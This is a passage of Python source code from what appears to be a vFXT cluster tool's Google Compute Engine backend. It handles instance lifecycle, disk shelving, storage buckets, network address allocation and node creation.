for zone in self._zone_names(all_regions):
page_token = None
while True:
try: # sometimes we can see a region/zone before we can inspect it
r = _gce_do(conn.instances().list, project=self.project_id, filter=search, zone=zone, pageToken=page_token)
if r and 'items' in r:
instances.extend(r['items'])
if r and 'nextPageToken' in r:
page_token = r['nextPageToken']
if not r or 'nextPageToken' not in r:
break
except Exception:
break
return instances
def get_instances(self, instance_ids, all_regions=True): #pylint: disable=arguments-differ
'''Returns a list of instances with the given instance ID list
Arguments:
instance_ids ([str]): list of instance id strings
all_regions (bool, optional): search all regions, not just the current
Returns:
[objs]: list of backend instance objects
'''
id_str = '|'.join(instance_ids)
search = 'name eq {}'.format(id_str)
conn = self.connection()
instances = []
for zone in self._zone_names(all_regions):
try: # sometimes we can see a region/zone before we can inspect it
r = _gce_do(conn.instances().list, project=self.project_id, filter=search, zone=zone)
if r and 'items' in r:
instances.extend(r['items'])
except Exception:
pass
return instances
def get_instance(self, instance_id, all_regions=True): #pylint: disable=arguments-differ
'''Get a specific instance by instance ID
Arguments:
instance_id (str)
all_regions (bool, optional): search all regions, not just the current
Returns:
obj or None
'''
conn = self.connection()
for zone in self._zone_names(all_regions):
try: # sometimes we can see a region/zone before we can inspect it
return _gce_do(conn.instances().get, project=self.project_id, instance=instance_id, zone=zone)
except Exception:
pass
return None
def wait_for_status(self, instance, status, retries=ServiceBase.WAIT_FOR_STATUS):
'''Poll on a given instance for status
Arguments:
instance (obj): backend instance object
status (str): status string to watch for
retries (int, optional): number of retries
Raises: vFXTServiceTimeout
'''
s = '...' # in case our instance is not yet alive
errors = 0
while status != s:
if retries % 10 == 0: # rate limit
log.debug("Waiting for status: {} != {}".format(s, status))
time.sleep(self.POLLTIME)
try:
instance = self.refresh(instance)
s = self.status(instance)
except Exception as e:
log.debug('Ignored: {}'.format(e))
errors += 1
time.sleep(backoff(errors))
retries -= 1
if retries == 0:
raise vFXTServiceTimeout("Timed out waiting for {} on {}".format(status, instance['name']))
def _wait_for_operation(self, response, msg='operation to complete', retries=ServiceBase.WAIT_FOR_OPERATION, op_type='zoneOperations', zone=None):
'''Wait for an operation to complete by polling the response
Arguments:
response (obj): response object from a prior service query
msg (str, optional): string to debug log for this operation
retries (int, optional): number of retries
op_type (str, optional): zoneOperations, globalOperations, ...
Raises: vFXTServiceFailure
'''
conn = self.connection()
op = getattr(conn, op_type)
errors = 0
while response['status'] != 'DONE':
try:
time.sleep(self.POLLTIME)
if retries % 10 == 0:
log.debug("Waiting for {}: {}".format(msg, response['status']))
operation = response['name']
args = {'project': self.project_id, 'operation': operation}
if op_type == 'zoneOperations':
args['zone'] = zone or self.zones[0]
response = _gce_do(op().get, **args)
except googleapiclient.errors.HttpError as e:
if int(e.resp['status']) < 500:
if 'httpErrorMessage' in response:
raise_from(vFXTServiceFailure("{}: {}".format(response['httpErrorMessage'], response['error']['errors'][0]['message'])), e)
raise_from(vFXTServiceFailure(e), e)
errors += 1
time.sleep(backoff(errors))
retries -= 1
if retries == 0:
raise vFXTServiceTimeout("Failed waiting for {}".format(msg))
if 'httpErrorMessage' in response:
log.debug("response {}".format(response))
raise vFXTServiceFailure("{}: {}".format(response['httpErrorMessage'], response['error']['errors'][0]['message']))
def can_stop(self, instance):
''' Some instance configurations cannot be stopped. Check if this is one.
Arguments:
instance: backend instance
'''
if 'SCRATCH' in [d['type'] for d in instance['disks']]:
raise vFXTConfigurationException("Cannot stop instance {} with local-ssd disks".format(self.name(instance)))
return True
def stop(self, instance, wait=ServiceBase.WAIT_FOR_STOP):
'''Stop an instance
Arguments:
instance: backend instance
'''
if not self.can_stop(instance):
raise vFXTConfigurationException("Node configuration prevents them from being stopped")
log.info("Stopping instance {}".format(self.name(instance)))
conn = self.connection()
zone = instance['zone'].split('/')[-1]
response = _gce_do(conn.instances().stop, project=self.project_id, zone=zone, instance=instance['name'])
log.debug(response)
self.wait_for_status(instance, self.OFF_STATUS, retries=wait)
def start(self, instance, wait=ServiceBase.WAIT_FOR_START):
'''Start an instance
Arguments:
instance: backend instance
wait (int): wait time
'''
log.info("Starting instance {}".format(self.name(instance)))
conn = self.connection()
zone = instance['zone'].split('/')[-1]
response = _gce_do(conn.instances().start, project=self.project_id, zone=zone, instance=instance['name'])
log.debug(response)
self.wait_for_status(instance, self.ON_STATUS, retries=wait)
def restart(self, instance, wait=ServiceBase.WAIT_FOR_RESTART):
'''Restart an instance
Arguments:
instance: backend instance
wait (int): wait time
'''
if not self.can_stop(instance):
raise vFXTConfigurationException("Node configuration prevents them from being restarted")
log.info("Restarting instance {}".format(self.name(instance)))
# GCE does not have a reboot option, only reset (which is not what we want)
self.stop(instance)
self.start(instance)
def destroy(self, instance, wait=ServiceBase.WAIT_FOR_DESTROY, keep_root_disk=False): #pylint: disable=arguments-differ
'''Destroy an instance
Arguments:
instance: backend instance
wait (int): wait time
keep_root_disk (bool, optional): keep the root disk
'''
conn = self.connection()
zone = instance['zone'].split('/')[-1]
root_disk = None
if keep_root_disk:
root_disks = [d for d in instance['disks'] if 'boot' in d and d['boot']]
if not root_disks:
raise vFXTServiceFailure("Failed to find root disk")
root_disk = root_disks[0]
self._disable_disk_auto_delete(instance, root_disk['deviceName'])
log.info("Destroying instance {}".format(self.name(instance)))
response = _gce_do(conn.instances().delete, project=self.project_id, zone=zone, instance=instance['name'])
# we wait because we cannot destroy resources still attached to the instance
self._wait_for_operation(response, msg='instance {} to be destroyed'.format(instance['name']), retries=wait, zone=zone)
for d in instance['disks']:
# skip our root if we want to keep it
if root_disk and d['deviceName'] == root_disk['deviceName']:
continue
try: # need to delete any leftover disks
resp = _gce_do(conn.disks().delete, project=self.project_id, zone=zone, disk=d['deviceName'])
self._wait_for_operation(resp, msg='disk to be deleted', zone=zone)
except Exception:
pass
expr = "nextHopInstance eq .*/{}$".format(instance['name'])
routes = _gce_do(conn.routes().list, project=self.network_project_id, filter=expr)
if not routes or 'items' not in routes:
return
for route in routes['items']:
try: # need to delete any leftover routes
resp = _gce_do(conn.routes().delete, project=self.network_project_id, route=route['name'])
self._wait_for_operation(resp, msg='route to be deleted', zone=zone)
except Exception:
pass
def is_on(self, instance):
'''Return True if the instance is currently on
Arguments:
instance: backend instance
'''
return instance['status'] != self.OFF_STATUS
def is_off(self, instance):
'''Return True if the instance is currently off
Arguments:
instance: backend instance
'''
return instance['status'] == self.OFF_STATUS
def is_shelved(self, instance):
'''Return True if the instance is currently shelved
Arguments:
instance: backend instance
'''
try:
metadata = instance['metadata']['items']
return 'shelved' in [v for opts in metadata for v in opts.values()]
except Exception:
return False
def name(self, instance):
'''Returns the instance name (may be different from instance id)
Arguments:
instance: backend instance
'''
return instance['name']
def instance_id(self, instance):
'''Returns the instance id (may be different from instance name)
Arguments:
instance: backend instance
'''
return instance['name']
def status(self, instance):
'''Return the instance status
Arguments:
instance: backend instance
'''
return instance['status']
def refresh(self, instance):
'''Refresh the instance from the Google backend
Arguments:
instance: backend instance
'''
i = self.get_instance(instance['name'])
if not i:
raise vFXTConfigurationException("Failed to find instance: {}".format(instance['name']))
return i
def ip(self, instance):
'''Return the primary IP address of the instance
Arguments:
instance: backend instance
'''
try:
return instance['networkInterfaces'][0]['networkIP']
except Exception:
log.error("Unable to find first networkInterface networkIP in {}".format(instance))
def fqdn(self, instance): # XXX revisit
'''Provide the fully qualified domain name of the instance
Arguments:
instance: backend instance
'''
name = instance['name']
return "{}.c.{}.internal".format(name, self.project_id)
def can_shelve(self, instance):
''' Some instance configurations cannot be shelved. Check if this is one.
Arguments:
instance: backend instance
'''
if 'SCRATCH' in [d['type'] for d in instance['disks']]:
log.error("Cannot shelve {} with local-ssd disks".format(instance['name']))
return False
return True
def shelve(self, instance):
''' shelve the instance; shut it down, detach and delete
all non-root block devices
Arguments:
instance: backend instance
Raises: vFXTServiceFailure
'''
conn = self.connection()
zone = instance['zone'].split('/')[-1]
if not self.can_shelve(instance):
raise vFXTConfigurationException("{} configuration prevents shelving".format(self.name(instance)))
if self.is_shelved(instance):
raise vFXTConfigurationException("{} is already shelved".format(self.name(instance)))
if self.is_on(instance):
self.stop(instance)
instance = self.refresh(instance)
disks = instance['disks']
non_root_disks = [d for d in disks if 'boot' not in d or not d['boot']]
if not non_root_disks:
log.info("No non-root volumes for instance {}, already shelved?".format(instance['name']))
return
log.debug("Found non-root volumes: {}".format(non_root_disks))
disk_srv = conn.disks()
errors = ShelveErrors()
detach_failed = []
disk_size = None
disk_type = None
for nrd in non_root_disks:
name = nrd['source'].split('/')[-1]
data = _gce_do(disk_srv.get, project=self.project_id, zone=zone, disk=name)
log.info("{}: detaching and deleting {}".format(instance['name'], name))
try:
r = _gce_do(conn.instances().detachDisk, project=self.project_id, zone=zone, instance=instance['name'], deviceName=nrd['deviceName'])
self._wait_for_operation(r, msg='disk to be detached', zone=zone)
r = _gce_do(disk_srv.delete, project=self.project_id, zone=zone, disk=name)
self._wait_for_operation(r, msg='disk to be deleted', zone=zone)
except Exception:
detach_failed.append(name)
# XXX assume all volume attributes are uniform
disk_size = data['sizeGb']
disk_type = data['type']
if detach_failed:
errors['notdetached'] = ','.join(detach_failed)
shelved = "{}|{}|{}".format(len(non_root_disks), disk_size, disk_type)
if errors:
shelved += '|{}'.format(errors)
log.debug("Creating shelved metadata: {}".format(shelved))
instance = self.refresh(instance)
self._set_metadata(instance, "shelved", shelved)
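# The "shelved" metadata value is "<disk count>|<sizeGb>|<disk type>"
# (with "|<errors>" appended when detach/delete failures occurred);
# unshelve() parses the first three fields to recreate the data disks.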
def unshelve(self, instance, count_override=None, size_override=None, type_override=None, **options): #pylint: disable=unused-argument,arguments-differ
''' bring our instance back to life. This requires a metadata tag called
shelved that contains the number of disks and their size/type
Arguments:
instance: backend instance
count_override (int, optional): number of data disks
size_override (int, optional): size of data disks
type_override (str, optional): type of data disks
Raises: vFXTServiceFailure
'''
conn = self.connection()
zone = instance['zone'].split('/')[-1]
# assume we've previously killed the data disks and set a tag
if not self._get_metadata(instance, "shelved"):
log.info("{} does not have shelved tag, skipping".format(instance['name']))
return
# XXX assume instance is already stopped
if self.is_on(instance):
log.info("{} is not stopped, skipping".format(instance['name']))
return
try:
attrs = self._get_metadata(instance, "shelved").split('|')
vol_count, vol_size, vol_type = attrs[0:3]
except Exception:
log.error("{} does not have data in the shelved tag".format(instance['name']))
return
if len(instance['disks']) > 1:
log.info("{} appears to already have data disks, skipping".format(instance['name']))
return
if count_override:
vol_count = count_override
if size_override:
vol_size = size_override
if type_override:
vol_type = type_override
i_srv = conn.instances()
d_srv = conn.disks()
disks_created = []
try:
for i in range(int(vol_count)):
disk_name = "{}-data-{}".format(instance['name'], i + 1)
body = {'name': disk_name, "sizeGb": int(vol_size), 'type': vol_type}
log.info("{}: creating {} volume {}".format(instance['name'], vol_size, disk_name))
r = _gce_do(d_srv.insert, project=self.project_id, zone=zone, body=body)
self._wait_for_operation(r, msg='disk to be created', zone=zone)
d = _gce_do(d_srv.get, project=self.project_id, zone=zone, disk=disk_name)
disks_created.append(d)
body = {'deviceName': disk_name, "source": d['selfLink'], "autoDelete": True}
log.info("{}: attaching disk {}".format(instance['name'], disk_name))
r = _gce_do(i_srv.attachDisk, project=self.project_id, zone=zone, instance=instance['name'], body=body)
self._wait_for_operation(r, msg='disk to be attached', zone=zone)
except Exception as e:
log.debug(e)
log.error("Error while creating volumes, undoing what we did")
instance = self.refresh(instance)
for d in disks_created:
if d['name'] in [dev['deviceName'] for dev in instance['disks']]:
r = _gce_do(i_srv.detachDisk, project=self.project_id, zone=zone, instance=instance['name'], deviceName=d['name'])
self._wait_for_operation(r, msg='disk to be detached', zone=zone)
r = _gce_do(d_srv.delete, project=self.project_id, zone=zone, disk=d['name'])
self._wait_for_operation(r, msg='disk to be deleted', zone=zone)
raise_from(vFXTServiceFailure(e), e)
self.start(instance)
instance = self.refresh(instance)
self._delete_metadata(instance, 'shelved')
# No GCE equivalent
def wait_for_service_checks(self, instance, retries=ServiceBase.WAIT_FOR_SERVICE_CHECKS): pass
# storage/buckets
def create_bucket(self, name, **options): #pylint: disable=arguments-differ
'''Create a bucket
Arguments:
name (str): bucket name to create
storage_class (str, optional): storage class of MULTI_REGIONAL, REGIONAL,
STANDARD, NEARLINE, COLDLINE, and DURABLE_REDUCED_AVAILABILITY
region (str, optional): region for the bucket if using REGIONAL (defaults to service default region)
tags (dict, optional): tag labels to apply to the bucket
Raises: vFXTServiceFailure
'''
if not self.valid_bucketname(name):
raise vFXTConfigurationException("{} is not a valid bucket name".format(name))
storage_service = self.connection(connection_type='storage')
storage_class = options.get('storage_class') or 'STANDARD'
if storage_class not in self.STORAGE_CLASSES:
raise vFXTConfigurationException("{} is not a valid storage class".format(storage_class))
body = {'name': name, 'storageClass': storage_class}
if storage_class == 'REGIONAL':
region = options.get('region') or self._zone_to_region(self.zones[0])
body['location'] = region
if 'tags' in options:
labels = options.get('tags')
bad_name_re = re.compile('[^a-z_]')
filtered_labels = {k: v for k, v in viewitems(labels) if not k.startswith('_') and not re.search(bad_name_re, k)}
if len(filtered_labels) != len(labels):
l_keys = set(labels.keys())
fl_keys = set(filtered_labels.keys())
err = "Discarding invalid bucket labels: {}".format(', '.join(l_keys - fl_keys))
log.error(err)
body['labels'] = filtered_labels
log.debug("Bucket create request {}".format(body))
return _gce_do(storage_service.buckets().insert, project=self.project_id, body=body)
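# Illustrative usage (hypothetical bucket name and labels):
#   self.create_bucket('my-vfxt-bucket', storage_class='REGIONAL',
#                      region='us-central1', tags={'cluster': 'demo'})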
def delete_bucket(self, name):
'''Delete a bucket
Arguments:
name (str): bucket name
Raises: vFXTServiceFailure
'''
try:
storage_service = self.connection(connection_type='storage')
_gce_do(storage_service.buckets().delete, bucket=name)
except Exception as e:
raise_from(vFXTServiceFailure("Failed to delete bucket {}: {}".format(name, e)), e)
def authorize_bucket(self, cluster, name, retries=ServiceBase.CLOUD_API_RETRIES, xmlrpc=None):
'''Perform any backend work for the bucket, and register a credential
for it to the cluster
No authorization is currently performed for GCE.
Arguments:
cluster (Cluster): cluster object
name (str): bucket name
retries (int, optional): number of attempts to make
xmlrpc (xmlrpcClt, optional): xmlrpc client connection to use; a new one is created if not provided
Raises: vFXTServiceFailure
'''
xmlrpc = cluster.xmlrpc() if xmlrpc is None else xmlrpc
existing_creds = cluster._xmlrpc_do(xmlrpc.corefiler.listCredentials, _xmlrpc_do_retries=retries)
# see if we have s3 interop credentials
if self.s3_access_key and self.s3_secret_access_key:
log.debug("Found s3 access keys")
cred_name = 's3-{}'.format(cluster.name)
# if it exists, use it
if cred_name in [c['name'] for c in existing_creds]:
return cred_name
log.debug("Creating credential {}".format(cred_name))
cred_body = {
'accessKey': self.s3_access_key,
'privateKey': self.s3_secret_access_key,
}
r = cluster._xmlrpc_do(xmlrpc.corefiler.createCredential, cred_name, self.COREFILER_CRED_TYPE, cred_body)
if r != 'success':
raise vFXTConfigurationException("Could not create credential {}: {}".format(cred_name, r))
return cred_name
# otherwise use the first default
if not existing_creds:
raise vFXTConfigurationException("Could not find existing credential to use")
return existing_creds[0]['name']
# networking
def get_default_router(self, subnetwork=None): #pylint: disable=arguments-differ
'''Get default route address
Arguments:
subnetwork (str, optional): subnetwork name
Returns:
str: address of default router
'''
network = self._get_network()
if 'gatewayIPv4' in network:
return network['gatewayIPv4']
if 'subnetworks' in network:
region = self._zone_to_region(self.zones[0])
region_gateways = [] # subnetwork gateways associated with our region
subnetwork = subnetwork or self.subnetwork_id
# try to find a direct match if we have a subnetwork
subnetworks = self._get_subnetworks(region)
for sn in subnetworks:
if subnetwork and sn['name'] == subnetwork:
return sn['gatewayAddress']
region_gateways.append(sn['gatewayAddress'])
# otherwise pick one associated with our region
if region_gateways:
return region_gateways[0]
raise vFXTConfigurationException("Unable to determine default router for this configuration")
def get_dns_servers(self):
'''Get DNS server addresses
Returns:
[str]: list of DNS server addresses
'''
dns = []
dns.extend(self.DNS_SERVERS)
dns.insert(0, self.get_default_router())
return dns
def get_ntp_servers(self):
'''Get NTP server addresses
Returns:
[str]: list of NTP server addresses
'''
return self.NTP_SERVERS
def in_use_addresses(self, cidr_block, category='all'): #pylint: disable=arguments-differ
'''Return a list of in use addresses within the specified cidr
Arguments:
cidr_block (str)
category (str): all, interfaces, routes
'''
conn = self.connection()
c = Cidr(cidr_block)
addresses = set()
if category in ['all', 'interfaces']:
for instance in self.find_instances(all_regions=True):
for interface in instance['networkInterfaces']:
interface_address = interface.get('networkIP')
if interface_address:
if c.contains(interface_address):
addresses.add(interface_address)
if 'aliasIpRanges' in interface:
ip_aliases = interface.get('aliasIpRanges')
for ip_alias in ip_aliases:
if '/' in ip_alias['ipCidrRange'] and ip_alias['ipCidrRange'].split('/')[-1] != '32':
alias_range = Cidr(ip_alias['ipCidrRange'])
alias_addresses = Cidr.expand_address_range(alias_range.start_address(), alias_range.end_address())
addresses.update(alias_addresses)
continue
alias_address = ip_alias['ipCidrRange'].split('/')[0]
if c.contains(alias_address):
addresses.add(alias_address)
if category in ['all', 'routes']:
search = 'destRange eq .*/32' # only point to point addresses
resp = _gce_do(conn.routes().list, project=self.network_project_id, filter=search)
if resp and 'items' in resp:
for route in resp['items']:
# skip if we don't have a next hop instance (dangling route)
if any([_['code'] == 'NEXT_HOP_INSTANCE_NOT_FOUND' for _ in route.get('warnings', [])]) or 'nextHopInstance' not in route:
continue
addr = route['destRange'].split('/')[0]
if c.contains(addr):
addresses.add(addr)
return list(addresses)
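# Illustrative usage (hypothetical range): collect addresses already claimed
# by instance NICs, alias ranges, or /32 routes within a block:
#   used = self.in_use_addresses('10.0.0.0/24')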
def _cidr_overlaps_network(self, cidr_range):
'''Check if a given cidr range falls within any of the network/subnetwork ranges
of the current configuration
cidr_range (str): IP address range in CIDR notation
'''
cidr = Cidr(cidr_range)
address = cidr.start_address()
network = self._get_network()
if 'subnetworks' in network:
subnetwork = self._get_subnetwork(self.subnetwork_id)
for r in subnetwork.get('secondaryIpRanges', []):
if 'ipCidrRange' not in r:
continue
secondary_range = Cidr(r['ipCidrRange'])
if secondary_range.contains(address):
return True
if 'ipCidrRange' in subnetwork:
subnetwork_range = Cidr(subnetwork['ipCidrRange'])
if subnetwork_range.contains(address):
return True
else: # legacy
network_range = Cidr(network['IPv4Range'])
if network_range.contains(address):
return True
return False
def get_available_addresses(self, count=1, contiguous=False, addr_range=None, in_use=None):
'''Returns a list of available addresses for the given range
Arguments:
count (int, optional): number of addresses required
contiguous (bool=False): addresses must be contiguous
addr_range (str, optional): address range cidr block
in_use ([str], optional): list of addresses known to be used
Returns:
([], str): tuple of address list and netmask str
Raises: vFXTConfigurationException
'''
honor_reserves = True # leave out reserved (first 4) addresses in a cidr range
# find an unused range, either provided or default
addr_range = addr_range or self.private_range
if addr_range:
log.debug("Using specified address range {}".format(addr_range))
else:
network = self._get_network()
if 'subnetworks' in network:
subnetwork = self._get_subnetwork(self.subnetwork_id)
if 'secondaryIpRanges' in subnetwork:
honor_reserves = False
r = subnetwork['secondaryIpRanges'][0] # XXX only using the first one (support more than one if avail?)
addr_range = r['ipCidrRange']
log.debug("Using subnetwork {} {} secondary range of {}".format(subnetwork['name'], r.get('rangeName', 'unnamed'), r['ipCidrRange']))
else:
log.debug("Using subnetwork {} range of {}".format(subnetwork['name'], subnetwork['ipCidrRange']))
addr_range = subnetwork['ipCidrRange']
# otherwise we use our defaults
addr_range = addr_range or self.DEFAULT_CLUSTER_NETWORK_RANGE
used = self.in_use_addresses(addr_range)
if in_use:
used.extend(in_use)
used = list(set(used))
addr_cidr = Cidr(addr_range)
try:
avail = addr_cidr.available(count, contiguous, used, honor_reserves)
netmask = "255.255.255.255" # hardcoded for gce /32
return (avail, netmask)
except Exception as e:
raise_from(vFXTConfigurationException("Check that the subnetwork or specified address range has enough free addresses: {}".format(e)), e)
def export(self):
'''Export the service object in an easy to serialize format
Returns:
{}: serializable dictionary
'''
data = {
'zone': self.zones,
'network_id': self.network_id,
'client_email': self.client_email,
'project_id': self.project_id
}
if self.key_file:
data['key_file'] = self.key_file
if self.key_data:
data['key_data'] = self.key_data
if self.access_token:
data['access_token'] = self.access_token
if self.s3_access_key:
data['s3_access_key'] = self.s3_access_key
if self.s3_secret_access_key:
data['s3_secret_access_key'] = self.s3_secret_access_key
if self.private_range:
data['private_range'] = self.private_range
if self.proxy_uri:
data['proxy_uri'] = self.proxy_uri
if self.subnetwork_id:
data['subnetwork_id'] = self.subnetwork_id
return data
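# The exported keys mirror the Service() constructor keyword arguments, so
# the dict can be fed back as Service(**data) to build an equivalent
# service object.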
def create_instance(self, machine_type, name, boot_disk_image, other_disks=None, **options): #pylint: disable=arguments-differ
'''Create and return a GCE instance
Arguments:
machine_type (str): GCE machine type
name (str): name of the instance
boot_disk_image (str): the name of the disk image for the root disk
boot_disk (str, optional): the name of an existing disk for use as the root disk (instead of a disk image)
other_disks ([], optional): GCE disk definitions
metadata (dict, optional): metadata tags to apply to instance
disk_type (str, optional): type of disk to use for root disk
root_size (int, optional): root disk size in GB
tags ([], optional): list of GCE network tags to apply to the instance
labels ({}, optional): dictionary of GCE labels to apply to the instance
zone (str, optional): create in custom zone
auto_public_address (bool, optional): auto assign a public address (defaults to False)
private_ip_address (str, optional): primary private IP address
wait_for_success (int, optional): wait time for the instance to report success (default WAIT_FOR_SUCCESS)
service_account (str, optional): Service account name to start the instance with (defaults to the default service account)
scopes ([], optional): List of service scopes for the instance (default DEFAULT_SCOPES)
subnetwork (str, optional): subnetwork path (projects/project-foo/regions/us-east1/subnetworks/foo)
Raises: vFXTConfigurationException, vFXTServiceFailure
Service failures here are uncaught exceptions and should be handled
by the caller.
boot_disk_image format is the image name for local images (or the more
formal global/images/my-private-image). For images from other projects,
the format is projects/<project>/global/images/<image name>. The full
URL also is accepted.
'''
if not self.valid_instancename(name):
raise vFXTConfigurationException("{} is not a valid instance name".format(name))
if self.get_instance(name):
raise vFXTConfigurationException("{} exists".format(name))
machine_defs = self.MACHINE_DEFAULTS[machine_type]
conn = self.connection()
network = self._get_network()
zone = options.get('zone') or self.zones[0]
subnetwork = options.get('subnetwork') or self.subnetwork_id
disk_type = options.get('disk_type') or machine_defs['root_disk_type']
root_size = options.get('root_size') or None
metadata = options.get('metadata', None)
disk_type = _gce_do(conn.diskTypes().get, project=self.project_id, zone=zone, diskType=disk_type)
boot_image = {}
if boot_disk_image:
try:
boot_image = _gce_do(conn.images().get, project=self.project_id, image=boot_disk_image)
except Exception:
log.debug("Could not find boot_disk_image in our list of images, assuming public/other")
boot_image['selfLink'] = boot_disk_image
# gce instance defaults
# https://cloud.google.com/compute/docs/reference/latest/instances#resource
body = {}
body['name'] = name
body['machineType'] = "{}/{}/zones/{}/machineTypes/{}".format(self.GCE_URL, self.project_id, zone, machine_type)
body['disks'] = [{
'autoDelete': True,
'boot': True,
'type': 'PERSISTENT',
'deviceName': '{}-boot'.format(name),
}
]
if options.get('boot_disk'):
# fetch the disk
boot_disk = _gce_do(conn.disks().get, project=self.project_id, zone=zone, disk=options.get('boot_disk'))
body['disks'][0]['autoDelete'] = False
body['disks'][0]['source'] = boot_disk['selfLink']
else:
body['disks'][0]['initializeParams'] = {
'diskName': '{}-boot'.format(name),
'diskType': disk_type['selfLink'],
'sourceImage': boot_image['selfLink']
}
if root_size:
body['disks'][0]['initializeParams']['diskSizeGb'] = int(root_size)
if other_disks:
body['disks'].extend(other_disks)
body['networkInterfaces'] = [{'network': network['selfLink']}]
if subnetwork:
subnetwork = self._get_subnetwork(subnetwork)
body['networkInterfaces'][0]['subnetwork'] = subnetwork['selfLink']
body['networkInterfaces'][0]['network'] = subnetwork['network']
else:
subnetwork_region = self._zone_to_region(zone)
subnetworks = self._get_subnetworks(subnetwork_region)
if subnetworks: # no subnetwork specified, but we have them so use one
subnetwork = subnetworks[0]
log.warning("No subnetwork specified, picking {}".format(subnetwork['selfLink']))
body['networkInterfaces'][0]['subnetwork'] = subnetwork['selfLink']
body['networkInterfaces'][0]['network'] = subnetwork['network']
# optional ephemeral address
if options.get('auto_public_address', False):
nat_name = '{}-nat'.format(name)
nat_config = [{'kind': 'compute#accessConfig', 'type': 'ONE_TO_ONE_NAT', 'name': nat_name}]
body['networkInterfaces'][0]['accessConfigs'] = nat_config
if options.get('private_ip_address', False):
body['networkInterfaces'][0]['networkIP'] = options.get('private_ip_address')
if 'secondary_addresses' in options:
body['networkInterfaces'][0]['aliasIpRanges'] = []
for secondary_address in options.get('secondary_addresses'):
ip_cidr_range = {'ipCidrRange': secondary_address}
# if this is part of a subnetwork secondary range, we have to name it
if subnetwork:
for secondary_range in subnetwork.get('secondaryIpRanges', []):
if Cidr(secondary_range['ipCidrRange']).contains(secondary_address):
ip_cidr_range['subnetworkRangeName'] = secondary_range['rangeName']
body['networkInterfaces'][0]['aliasIpRanges'].append(ip_cidr_range)
scopes = options.get('scopes') or self.DEFAULT_SCOPES
if not isinstance(scopes, list) or not all([_.startswith('http') for _ in scopes]):
raise vFXTConfigurationException("Invalid scopes: {}".format(scopes))
body['serviceAccounts'] = [{
'email': options.get('service_account') or 'default',
'scopes': scopes
}]
body['canIpForward'] = True
body['tags'] = {'items': []}
body['labels'] = {}
body['metadata'] = {'items': []}
if 'tags' in options:
body['tags']['items'].extend(options['tags'])
if 'labels' in options:
body['labels'] = options['labels'].copy()
if metadata:
# google wants a list of this dict :-/
pairs = [{'key': k, 'value': v} for k, v in viewitems(metadata)]
body['metadata']['items'].extend(pairs)
log.debug("create_instance request body: {}".format(body))
try:
request_id = str(uuid.uuid4())
r = _gce_do(conn.instances().insert, project=self.project_id, zone=zone, requestId=request_id, body=body)
wait_for_success = options.get('wait_for_success') or self.WAIT_FOR_SUCCESS
self._wait_for_operation(r, msg='instance {} to be created'.format(name), retries=wait_for_success, zone=zone)
retries = self.CLOUD_API_RETRIES
while retries > 0:
n = self.get_instance(name)
if n:
return n
retries -= 1
time.sleep(self.POLLTIME)
raise vFXTServiceFailure("Unable to locate the created instance {}".format(name))
except Exception as e:
raise_from(vFXTServiceFailure("Create instance failed: {}".format(e)), e)
def create_node(self, node_name, cfg, node_opts, instance_options):
'''Create a cluster node
This is a frontend for create_instance that handles vFXT node specifics
Arguments:
node_name (str): name of the node
cfg (str): configuration string to pass to the node
node_opts (dict): node creation options
instance_options (dict): options passed to create_instance
node_opts include:
data_disk_size: size of data disks (in MB)
data_disk_type: disk type of data disk (pd-standard, pd-ssd, local-ssd)
data_disk_count: number of data disks
data_disk_nvme (bool): use NVME instead of SCSI
metadata (dict)
machine_type
root_image: disk image name
disk_type: root disk type
'''
conn = self.connection()
if self.get_instance(node_name):
raise vFXTNodeExistsException("Node {} exists".format(node_name))
use_local_ssd = False
if node_opts['data_disk_type'] == 'local-ssd':
use_local_ssd = True
# local-ssd sizes cannot be anything but 375
node_opts['data_disk_size'] = 375
if int(node_opts['data_disk_count']) > 8:
raise vFXTConfigurationException("{} is larger than 8, the maximum for number of local-ssd disks".format(node_opts['data_disk_count']))
zone = instance_options.get('zone') or self.zones[0]
data_disk_url = _gce_do(conn.diskTypes().get, project=self.project_id, zone=zone, diskType=node_opts['data_disk_type'])['selfLink']
data_disk_disks = []
try:
node_meta = node_opts.get('metadata', {})
node_meta['cluster_cfg'] = cfg
for idx in range(node_opts['data_disk_count']):
data_disk_name = "{}-data-{}".format(node_name, idx + 1)
data_disk_disk = {}
# local-ssd can only be created atomically with the instance so
# we only define it here
if use_local_ssd:
data_disk_disk = {
'autoDelete': True,
'type': 'SCRATCH',
'interface': 'NVME' if node_opts.get('data_disk_nvme') else 'SCSI',
'deviceName': data_disk_name,
'initializeParams': {
'diskType': data_disk_url,
'diskSizeGb': node_opts['data_disk_size'],
},
}
else: # otherwise, create the data disks before the instance
body = {'name': data_disk_name, 'sizeGb': int(node_opts['data_disk_size']), 'type': data_disk_url}
log.info("Creating data disk {} for {}".format(idx + 1, node_name))
log.debug("data disk request body: {}".format(body))
r = _gce_do(conn.disks().insert, project=self.project_id, zone=zone, body=body)
self._wait_for_operation(r, msg='disk to be created', zone=zone)
created_disk = _gce_do(conn.disks().get, project=self.project_id, zone=zone, disk=data_disk_name)
data_disk_disk = {'autoDelete': True, 'type': 'PERSISTENT', 'source': created_disk['selfLink'], 'deviceName': data_disk_name}
data_disk_disks.append(data_disk_disk)
log.info("Creating node {}".format(node_name))
n = self.create_instance(machine_type=node_opts['machine_type'],
name=node_name,
boot_disk_image=node_opts['root_image'],
disk_type=node_opts.get('disk_type') or None,
other_disks=data_disk_disks,
metadata=node_meta,
**instance_options
)
log.info("Created {} ({})".format(n['selfLink'], n['networkInterfaces'][0]['networkIP']))
return n
except (vFXTServiceFailure, vFXTConfigurationException) as e:
log.debug(e)
n = self.get_instance(node_name)
if n:
self.destroy(n)
elif data_disk_disks:
for data_disk_disk in data_disk_disks:
if data_disk_disk['type'] != 'PERSISTENT': # only created disks
continue
try:
log.debug("Removing data disk {}".format(data_disk_disk['deviceName']))
r = _gce_do(conn.disks().delete, project=self.project_id, zone=zone, disk=data_disk_disk['deviceName'])
self._wait_for_operation(r, msg='disk to be deleted', zone=zone)
except Exception as disk_e:
log.error("Failed to remove data disk: {}".format(disk_e))
raise
def create_cluster(self, cluster, **options):
'''Create a vFXT cluster (calls create_node for each node)
Typically called via vFXT.Cluster.create()
Arguments:
cluster (vFXT.cluster.Cluster): cluster object
size (int, optional): size of cluster (node count)
root_image (str, optional): root disk image name
disk_type (str, optional): root disk type
data_disk_size (int, optional): size of data disk (or machine type default)
data_disk_count (int, optional): number of data disks (or machine type default)
data_disk_type (str, optional): type of data disks (or machine type default)
metadata (dict, optional): metadata for instance
config_expiration (int, optional): expiration time for cluster join configuration
skip_cleanup (bool, optional): do not clean up on failure
zones ([str], optional): one or more zones
management_address (str, optional): management address for the cluster
